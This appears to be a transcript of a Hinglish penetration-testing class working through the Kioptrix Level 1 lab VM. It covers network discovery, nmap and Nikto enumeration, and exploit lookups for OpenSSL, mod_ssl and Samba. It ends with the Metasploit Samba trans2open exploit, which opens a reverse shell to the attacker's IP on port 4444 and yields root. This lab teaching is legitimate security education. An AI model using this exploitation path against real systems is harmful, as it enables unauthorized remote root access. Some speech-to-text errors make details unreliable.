Okay, so major part, Cryptics level 1. So we can see the IP address, which is our attacker's IP address. Attacker's IP address over here is 192.168.0.107. And route-n basically will identify the gateway IP address, which is our router's gateway IP address. Router is some network device connected. So you can see over here 192.168.0.1, which has an Ethio, which is Ethernet, NIC card की बात हो रही है यहाँ पे. So let's check with the सर number of. सर सर एक डाउट है सर, राउट हाइफन एन से सर डिफॉल्ट गेटवे पता चल जाता है, बट सर सबनेट कैसे पता चलेगा? मेरा सबनेट है ना 16 पे काम करता है। कौन से में, which one में? मेरी CIDR आईडी जो होती, मतलब CIDR आईडी होती है ना, मैं अगर ये डाल दूं ना खाली 192 नेट डिस्कवर में अब, हम्म, तो नहीं करेगा डिस्कवर। सिर्फ नेट मशीन, डिस्कवर. हाँ नेट डिस्कवर में मतलब डालूं ना अगर मैं हाँ जी. रेंज डाल के, मतलब सब कुछ पोर्ट लिख के इंटरफेस लिख के, तो ये करता नहीं है सर डिस्कवर। डिफॉल्ट सबनेट मास्क पे नहीं चलता मेरा ये 24 पे। ऐसा तो नहीं होना चाहिए. मेरा 16 पे चलता है सर, मैंने करा है बहुत, मतलब करता हूँ मेरे को तो। नहीं, आप ये देखो कि जब आप नेट डिस्कवर करते हो तो मेजरली, मैं दिखाता हूँ आपको. जब आप नेट डिस्कवर करते हो तो मेजरली ये आपके बिट्स पे डिपेंड करता है, और ये आपके 24, 16 और 8 पे काम करेगा, जिसमें देखो आप क्लास डिवाइडेड है यहाँ पे. हाँ वही तो सर, मैं अगर 192 की सीरीज की क्लास डालूंगा तो डिफॉल्ट 24 पे चलता है। हाँ जी. अगर 172 डालूंगा तो क्लास बी का हो जाएगा, तो वो 16 पे लेगा। बट हम्म. मेरा तो सर 192 पे ही जाएगा, तो 24 पे करता है वो स्कैन। फिर मेरे को उसको अगर सही IDR नंबर है 24 की जगह 16 डालता हूँ, तब जाके स्कैन करता है। ओके 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 ओके. तो वो रिकॉग्नाइज नहीं कर पाता मेरा राउट हाइफन इसको, और कोई मेथड नहीं, क्योंकि सबनेटिंग तो कहीं भी हो सकती है सर। सबनेटिंग में डिपेंड करती है, ऐसी कोई बात नहीं है कि सबनेटिंग की आप बात कर रहे हो. 16 का मतलब क्या है, आप 8, 16 और 24 यूज कर सकते हो. नहीं नहीं सर, क्लास सी के एड्रेस को अगर क्लास बी से कंबाइन करे तो मतलब सबनेट ही कर रखा है ना। हाँ, सबनेट कर रखा है. तो वो तो पता मेरे को कैसे पता चलेगा सर? मैं तो बेमतलब स्कैन करता रह जाऊंगा ना। बेसिकली यहाँ पे तो सिंपल मुझे, मैं तो राउट आईफोन से गेटवे देख सकता हूँ, ठीक है. बट डिपेंड करता है, जब आप IF कॉन्फ़िग करते हो तो आपकी आईपी एड्रेस क्या है. मेरी आईपी एड्रेस यहाँ पे दिख रही, क्लास सी की आईपी एड्रेस हम्म। है ना. अगर यहाँ पे इसमें कोई कैटेगरीज डिफाइन नहीं है कि आप नेट डिस्कवर में सिर्फ 24 ही यूज करना है, मैं 16 भी यूज कर सकता हूँ, 8 भी यूज कर सकता हूँ. अगर आप यहाँ पे देखो, मैं यूज कर रहा हूँ एक मिनट. नेट डिस्कवर -i ethio -r 192.168.0.1/16 तब भी आ रहा है. मेरा नहीं आता सर उस पर। /8. अब जब मैंने 8 किया था, देख लो, उसने अपना ये सबनेटिंग चेंज कर रहा है, देख लो. उसके रेंज में ये अपने खुद सबनेटिंग डिफाइन करता है. अब उसके रेंज में अगर कोई आईपी एड्रेस आएगी तो उसको वो मानेगा. तो यानी कि ये 1 तक पहुंचने में बहुत टाइम लगा देगा. मेरा तो सर 24 पे तो आता ही नहीं है, कोई स्कैन ही नहीं करता। डिफॉल्ट 24 लेके चलता हूँ तो कोई स्कैन ही नहीं होता, 16 पे आ जाता है। इसमें देखो ना आप, इसमें सिंपली सबनेटिंग भी डिफाइन कर रखी है कि आप क्लास बी में 16 यूज कर सकते हो, 24 भी यूज कर सकते हो, या 8 भी यूज कर सकते हो. या क्लास ए में आप 8 यूज करो या 16 यूज करो या 24 यूज करो, वो डिपेंड करता है आपको. So you can see in his range he find another IP address which is your PCS, but it's a slow process. So either you can put /24, your 16, yeah, 24. It's on. It's up to you. If I put 24 here, so I can see it's still scanning the entire network, and you can see the IP address over here.
The very first thing is to identify the number of hosts which are currently present on this server side. So हमारा जो target IP address है वो हमारा 109. So 109 जब मैं open करता हूँ तो वहाँ पे एक pop-up होता है, test page. If you have the administrator of this website, you can see that you may now add contents to the directory replace on the page. Okay, this is a normal thing. If you have upgraded it from Red Hat Linux 6.2 and earlier, then you are seeing this page because of the default document root in the directory of etc httpd config.php. और ये फाइल किसकी होती है? हमारी Apache server की configuration files होती है. For example, if you see in your Linux server etc Apache 2, you can see the configuration file of your Apache server. So उसने भी यहाँ पे क्या बोला हुआ है? Simple, if you have upgraded from Linux 6.2, you can see the data of your Apache server. So it means they have upgraded their Linux server, and they are basically using Red Hat Linux. So the most important thing over here is सबसे पहली चीज आपको इसमें nmap करना है, network mapper. So nmap, so most of the thing advanced scan करते हैं, skip scan, service plus version. That's enough for us. And -T4 for threads. So IP address of the server 109. So I'm using SC concatenate server, script scan, default script scan with the SV service plus version. And I'm using time and performance with the T4i tag. The main objective when you're performing an nmap scan, remember, you have to identify the service plus their specific version plus the open ports plus the OS type. Which is a part of your banner grabbing and fingerprinting. Identify the service plus version and OS type. This is the important part. So the main objective, majorly through nmap SC, मैं basically use कर रहा हूँ script scan. If you see over here with the nmap -help, you can basically see script scan, which is a default scan from here, SC. And I'm using SV also, which is service plus version detection. So let's see if the scan has been done or not. Okay, so it will gonna take some time, more time over here. Remember one thing, जब आपको लगता है कि इसका वेब इंटरफेस ऑन है तो आप पहले से देखोगे कि उसमें कौन कौन सी एप्लीकेशन रन हो रही है, यानी कि वेबसाइट की टेक्नोलॉजी आप आइडेंटिफाई करोगे. तो मेरे पास यहाँ पे वेबलाइजर है, तो मैं वेबलाइजर से देख सकता हूँ कि कौन कौन सी सर्विसेज चल रही है इसके अंदर. वेबलाइजर जो आपका इंफॉर्मेशन गैदरिंग के लिए यूज होता है थ्रू वेबसाइट्स, कि सिंपल वेबलाइजर के थ्रू हम आइडेंटिफाई कर सकते हैं कि उस वेबसाइट में कौन कौन सी एप्लीकेशन रन हो रही है. जैसे फॉर एग्जांपल वेब सर्वर दिखा रहा है यहाँ पे अपाचे 1.3.20, ऑपरेटिंग सिस्टम यहाँ पे दिखा रहा है यूनिक्स सिस्टम, देख रहे हो आप. एंड वेब सर्वर एक्सटेंशंस यहाँ पे ओपन एसएसएल यूज हो रहा है और मोड एसएसएल यूज हो रहा है. अगर आप इन पे क्लिक करोगे so they can tell you they can tell you the open SSL versions. Webalizer track over 45,050 open SSLs, and these are the other websites traffics.
वेबलाइजर आइडेंटिफाई टेक्नोलॉजी ऑन वेबसाइट्स। सो अगर आप यहाँ पे देखो एनमैप में, अभी भी टाइम कितना ले रहा है ये। सो अगर मैं एक सिक्योरिटी पॉइंट ऑफ व्यू से बात करूं, बैनर ग्रैबिंग इंपॉर्टेंट है, सर्विस प्लस वर्जन को आइडेंटिफाई करना, जो कि मैं वेबलाइजर के थ्रू भी कर सकता हूँ। और एक और चीज है जिसके थ्रू मैं कर सकता हूँ, वो है आपका वर्ट वेब, -v verbose and the IP address. What web will is used for identifying the technology which you're using on the back end of a server. बैकएंड सर्वर में जो भी एप्लीकेशन यूज हो रही है उनके ऊपर आपकी पूरी डिटेल्स निकाल देता है ये। जब आप एडवांस स्कैन कर रहे हो, एससी ज्यादा एडवांस स्कैन करता है, तो इट विल टेक अ टाइम अराउंड 3 to 5 मिनट्स भी ले सकता है ये। जैसे कि यहाँ पे वर्ट वेब, so I guess it has some technical errors over here, time and connection. You can see over here the scan has been done. Okay, so as a service plus banner information, for a security reason you have to check each and everything. For example, the OpenSSH version plus the port 80 also, and port 111 which is RPC, जहाँ पे वो basically चल रहा है कुछ applications, और आपका port number 139 और 445। 139 जो कि हमारा Samba services है। This machine can be performed in 3 different ways. Okay, ये login हो ही नहीं रहा, ठीक है। So the major part, we have a, you can say a website. So we're gonna use Dirbuster. We're gonna use Dirbuster for identifying the directories. So this one is not working, guys. So I'm gonna leave this one. So Dirbuster. Dirbuster is basically your directory crawling. और crawling क्या होता है, आइडेंटिफाई करना कि उसमें कितनी सारी डायरेक्टरीज प्रेजेंट है जो कि हिडन है। मान लो कि आपको टारगेट दिया था robot.txt करने के लिए। robot.txt किस लिए होता है, क्रॉल करने के लिए, जो कि बहुत सारी वेबसाइट्स रखती है अपनी डायरेक्टरीज को आइडेंटिफाई करने के लिए। जैसे फॉर एग्जांपल अगर मैं गूगल करता हूँ, गूगल में अगर मैं robot.txt करूँ, so I can see the allow and disallow directories. The most of the cases जो कि यहाँ पे disallows दे रखी है, allow calendars. This is a directory with, okay, 404, the error not found, but it was showing that there is a file error. So same thing, Dirbuster से हम आइडेंटिफाई करेंगे उसकी उस वेबसाइट में कितनी सारी डायरेक्टरीज प्रेजेंट है जो कि हिडन हो, क्योंकि क्रॉलिंग करने से भी कुछ कभी कभार कुछ डेटा लीक हो जाती है। So number of threads. So we have to perform a brute force attack. So brute force attack करने के लिए हमें एक डिक्शनरी चाहिए होगी। So for that case, I'm going to use user share with the word list directory with the Dirbuster you can see over here, and we can use, there are some dictionaries. Either you can use Apache Enumerations or either you can use directories list. So I will recommend you to use the small one. It's much faster than that. Remove the recursive and the PHP extension should be PHP. PHP क्या मतलब वो वेबसाइट कौन सी टेक्नोलॉजी एक्सेप्ट कर रही है। बहुत सारी वेबसाइट ASP में बनी होती है, JSP में बनी होती है, तो आपको यहाँ पे मेंशन करना पड़ता है क्योंकि डायरेक्टरीज भी उसकी हिडन ही होती है। एंड स्टार्ट।
So you can see that there are some directories which is 403, which is forbidden. 200 means OK report. And in the tree, you can see the files directories. But the most important thing is the key of success. The key of success means you have to enumerate each and every services in the server. आपको एक एक करके सारी चीजें देखनी है. जैसे कि यहाँ पे CGI bin जो कि 403 फॉरबिडन है, परमिशन नहीं है. आइकन डायरेक्टरी में क्या मिल सकता है? डॉक्यूमेंट डायरेक्टरी में नहीं. मैनुअल मोड यूजेस यूजेस.html इसे ओपन करके देखते हैं क्या है, कौन सी यूज चल रही है बैकएंड में. यूजिंग स्टैटिक्स फॉर Cryptix लेवल 1. PNG icon test.php manual. Okay, let's see manual one, not found. Let's see test.php server not found. Okay, so crawling is an important part where you have to check each and every services which is running over there. In the MRTG, you can see there are some HTML files in here. So majorly what we can see over here, this is a normal thing. सो द मोस्ट इम्पोर्टेंट थिंग, जब आप किसी डायरेक्टरी स्कैन करते हो तो आपको पहले अनमैप करना है, आइडेंटिफाई करना है कि आपका मेजर टास्क क्या है, कि एक एक सर्विस को देखना है. जैसे यहाँ पे मैंने देखा था कि जब मैंने वेब टेक्नोलॉजी किया था, सबसे पहले नजर इसमें करो कि इसमें क्या क्या चल रहा है. ओपन एसएसएल वर्जन 2.9.8 देखते हैं कि इसकी कोई एक्सप्लॉइट अवेलेबल है कि नहीं. तो exploitdb.com. So we have exploitdb website over here. So majorly देखते हैं कि कौन कौन सी वनरेबिलिटीज हैं. यहाँ पे ओपन एसएसएल देखते हैं जो कि इसमें हमारे सर्वर में था 94 0.9.6 करके देखते हैं. तो अगर आप यहाँ पे देखो, यहाँ पे 2002 से लेकर 2 वनरेबिलिटीज दे रखी है, जो कि एक वेरीफाइड नहीं है और एक वेरीफाइड है. और एक में यहाँ पे देखा है रिमोट कोड एग्जीक्यूशन, और यहाँ पे देखा है डॉस अटैक. और ये देखो यूनिक्स सिस्टम. ओपन एसएसएल टू ओपन सी एसएसएल की आर्गुमेंट ओवरफ्लो. सो इट्स एन एक्सप्लॉइट, बट देयर इज अ 50-50 चांस कि अगर ये वर्क करेगा कि नहीं करेगा. तो सबसे पहले जितने भी सर्विसेज हैं सबों की वनरेबिलिटीज ढूंढो. जैसे फॉर एग्जांपल मैं अभी मोड एसएसएल देखूंगा कि 2.8.4 मिलता है कि नहीं, बट मैं इस बार exploitdb ना यूज करके अपने खुद के डेटाबेस में देखूंगा. तो मैं उसके लिए सर्च एक्सप्लॉइट जो टूल यूज होता है वो आपके exploitdb को फाइंड करने के लिए यूज होता है आपके लोकल टर्मिनल में. सो मोड एसएसएल 2.8.4, चलो एक कम कर देते हैं. तो अगर आप यहाँ पे देखो मोड एसएसएल की कुछ वनरेबिलिटीज मिली है मुझे, जिसमें लिखा हुआ है remote buffer overflow and the vulnerability name. First, check each and every services. You have to enumerate. जैसे कि मैंने सिंपल यहाँ पे 2 चीजें निकाली अभी. One of the best tool is your Nikto. Nikto is basically used to identify the misconfiguration services, or you can say unrealized link, unattached link. Nikto सबसे ज़्यादा पावरफुल टूल है आपको आइडेंटिफाई करने के लिए बग्स को, जो कि कुछ मलिशियस लिंक्स को भी आइडेंटिफाई कर देता है.
एक एक करके आपके सारे सर्विसेज को चेक करके वो आपको आइडेंटिफाई कराएगा कि कौन कौन सी वल्नरेबिलिटीज उसमें प्रेजेंट है। जैसे कि अगर आप देखो उसने खुद ही बोल दिया कि ये यूनिक्स सर्वर है, रेड हैट लिनक्स है, यहाँ पे सर्विसेज कौन कौन सी चल रही है। और अगर आप यहाँ पे थोड़ा सा नीचे देखोगे कि ये डायरेक्टरीज को भी क्रॉल करता है। बट बेस्ट चीज क्या है, अगर आप इसको देखो तो यहाँ पे अगर आप देखो Mode SSL and lower are vulnerable to a remote buffer overflow, which may allow a remote shell CV Mitra, and you can click over here and it will redirect you to the CV number, common vulnerability and exposures, and it will let you know what are the vulnerabilities over there. The DMN and SSM session cache code Mode SSL, which allows remote attacker to use buffer overflow to execute arbitrary code by a large client certificate that's signed a trustful certificate, which produce a serialized session. इंफॉर्मेशन गैदरिंग करो पहले, क्या क्या चीजें और मिल सकती है मुझे। जैसे कि अगर आप यहाँ पे देखो, यहाँ पे 139 सांबा भी चल रहा है। सांबा का वर्जन एनुमरेट करना है आपको। यहाँ पे सांबा का वर्जन दिख रहा है आपको? नहीं। सांबा का वर्जन डिटेक्ट करने के लिए मैं यहाँ पे यूज करूंगा मेटास्प्लॉइट का। So this is Metasploit. I guess all of you guys are familiar, सबको पता ही होगा। तो मैं यहाँ पे यूज करूंगा एक सर्च स्ट्रिंग, जिसमें मैं टाइप लिखूंगा कि मुझे ऑक्सिलरी चाहिए और नेम मुझे क्या चाहिए, एसएमबी। तो मैंने यहाँ पे कुछ पैरामीटर यूज करे, जैसे टाइप मैंने ऑक्सिलरी चाहिए मुझे सिर्फ, और मुझे क्या कौन सा कैटेगरी चाहिए, मुझे एसएमबी की कैटेगरीज को आइडेंटिफाई करना है। तो व्हेन आई हिट एंटर I can see all these are auxiliaries. अगर आप देखो auxiliary antilum stealer, और इसके बारे में दे रखा है Oracle SMB Relay Code Executions 2009 9 का है, 17 का भी है, यहाँ पे 18 के भी हैं। बट अगर आप थोड़ा सा और नीचे जाओगे, यहाँ पे दे रखा होगा SMB प्रोटेक्शन वर्जन 1 डिटेक्शन, वर्जन 2 डिटेक्शन। अगर आपको वर्जन 1 और वर्जन 2 डिटेक्शन नहीं करना तो आप सिंपली ये कर सकते हो, SMB वर्जन डिटेक्शन, दैट्स इट। जो कि SMB वर्जन कोई 1 प्रोटोकॉल भी हो या 2 भी हो या 3 भी हो, क्योंकि हर एक SMB वर्जन पे अलग अलग ऑपरेटिंग सिस्टम काम करते हैं। सो आई एम गोना यूज दिस वन, use auxiliary, show options, so configure the auxiliary first. So set our host, so set our host कौन सा है हमारा एक ही सिंगल आईपी एड्रेस। जहां पे आपका यस होगा वहां पे आपको फिल करना पड़ेगा। जैसे थ्रेड्स क्या होते हैं, आपके स्कैनिंग प्रोसेस को फास्ट करने के लिए यूज होता है। was verified, so I can see the IP address over there, which is 109. So let's run the auxiliary with the command run. आपने एक चीज देखी, जब मैंने इसे रन किया तो इसने डिटेक्ट कर लिया कि ये यूनिक्स सर्वर एसएमबी वर्जन आपका 2.2.1a चला रहा है। सो हम लोग क्या कर सकते हैं, एसएमबी वर्जन सबसे ज्यादा इंपॉर्टेंट होता है, जिसे हम बोलते हैं कर्नल एक्सप्लॉइटेशन। और इसका 139 पोर्ट नंबर ओपन था, तो इसके एसएमबी वर्जन के थ्रू अगर मैं एक बैनर ग्रैबिंग करता हूँ, सबसे मेन इंपॉर्टेंट थिंग है बैनर ग्रैबिंग। हमेशा अपने माइंड में रखना कि मुझे अगर कोई सर्विस मिल रही है तो मुझे उसका वर्जन देखना पड़ेगा। अगर मुझे कोई ओएस दिख रहा है तो उसका टाइप क्या है। सो ओवर हियर I'm going to use search string again and I'm going to put the Samba version. चेक करते हैं ये क्या निकाल के देता है। तो मैंने सिंपल सर्च किया तो मुझे यहाँ पे दिख रहा है Samba 2.2.1 में यहाँ पे बहुत सारी वल्नरेबिलिटी, यहाँ पे बहुत सारे एक्सप्लॉइट्स और ऑक्सिलरीज दिख रही है। और अगर मैं यहाँ पे देखूँ
एक्सप्लॉइट फ्री BSD Samba trans to open। फ्री BSD तो नहीं है हमारा, हमारा तो लिनक्स है, बट ये करेगा क्या, ओवरफ्लो अटैक ऑन द 32 बिट। ये वाला क्या करेगा, इट विल मेक अ चेन मेमोरी करप्शन। ट्रांस टू ओपन ओवरफ्लो। चलो नॉर्मल ये ना देखे, सिंपल गूगल में देके देखते हैं कि ये क्या दिखाता है हमें। सबसे पहले मैंने ये सांबा ट्रांस टू ओपन किया तो सिंपल मुझे यहाँ पे दिख रहा है कि सांबा ट्रांस टू ओपन ओवरफ्लो लाइनेक्स 32 बिट्स रैपिड 7। The disclosed year was 2003 and the created on 2018। और ये बेसिकली ये दूसरी वल्नरेबिलिटी है, and they are basically using trans to open Samba Linux server। You have to know your server। Linux and Unix are the same architectures, they are not different। So if you go, अगर आप यहाँ पे देखो, यहाँ पे भी ट्रांस टू ओपन था, बट यहाँ पे बहुत सारे ट्रांस टू ओपन है, सोलिरिस का भी है, फ्री BSD का भी है, बट वी कैन यूज द लिनक्स वन which is 32 bit architecture server। So copy this one, use show options to configure। ये देखना जरूर कि सिंपल आपने ये एक्सपर्ट आया कि नहीं। शो ऑप्शंस, अब ये देखो कि पोर्ट नंबर 139 पे अटैक कर रहा है वो। सेट आर होस्ट टारगेट IP एड्रेस, और कोई यहाँ पे है नहीं। सो अकॉर्डिंग टू दिस शो टारगेट्स देन सेट टारगेट्स IP एड्रेस। सो मेजर फंक्शन यहाँ पे सेट टारगेट का मतलब क्या है कि आपको एक रिवर्स प्लेटफॉर्म चाहिए होगा, तो शो पेलोड्स। शो पेलोड्स क्या करेगा, जो भी आपके ये आपके ट्रांस टू ओपन की जो भी वल्नरेबिलिटीज होंगी उनके अकॉर्डिंग पेलोड शो कर देगा आपका, जो कि आपको पता होगा कि रिवर्स शेल एंड बाइंड शेल में क्या डिफरेंस होता है। तो अगर आप यहाँ पे देखो, जेनरिक रिवर्स शेल, generic command shell and reverse TCP on inline, a reverse shell TCP meterpreter on the Linux server, Linux shell command line shell on the Linux server 32 bit। So you can use any of this one, so I'm going to use this one, set payload and the payload name, and show options again। So in this one you can see when the payload will execute, it will give me a bin sh, which is a shell file। Then lhost, lhost means attacker's IP address 107। So let's put set lhost 192.168.1.0.107, cross verify, and you can see the port number which will open, which is 4444 over here। So एक्सप्लॉइट करके देखते हैं कि काम करता है कि नहीं। सो यू कैन सी ओवर हियर कि सबसे पहले 109 में क्या हो रहा है, हम लोग एक बफर भेज देते हैं यहाँ पे, देख लो ये आपकी बफर मेमोरी है। कमांड शेल 1 सेशन ओपन, यानी कि हम टर्मिनल में है। अगर मैं यहाँ पे who am I करूँ, I can see it's reflecting with the name called root। For example, if you put who am I in your terminal, you can see that who is the current user, and that means it's root over here। So we are right now in a shell program। shell मतलब आपके पास कोई टर्मिनल नहीं है, टर्मिनल जो कि हमारा इसे बोलते हैं TTY। टू गेट द टर्मिनल, मैंने आपको कल बताया था कि एक वेबसाइट है आपकी Gotmilk Linux fuel escalation।
So over here I'm gonna use, see, if the commands are limited, you can break the jail shell. So I'm gonna use bin sh, or we can use Python also. But for using Python, we have to check, is Python available on the server. So I'm gonna use which command, which will tell us the Python is installed or not. So we have Python server over there. So I'm gonna paste the GTO server. Okay, there's an interruption over there. So दूसरा करके देखते हैं, bin sh, and we can see we have a shell which is hash over here. Who am I? I am root. ls-all. So we can see the directories over here. So the main objective of CTF, or you can say a system hacking or system pen testing, is to check कि कैसे एक hacker एक simply उस remote shell पे एक access gain करता है. All you have to do is to produce a proper notes. You have to check all these vulnerabilities. Cryptrix एक तरीके से बताया, but यहाँ पे बहुत सारे तरीके से हो सकता है. This machine can be performed in this also with the mode SSL version.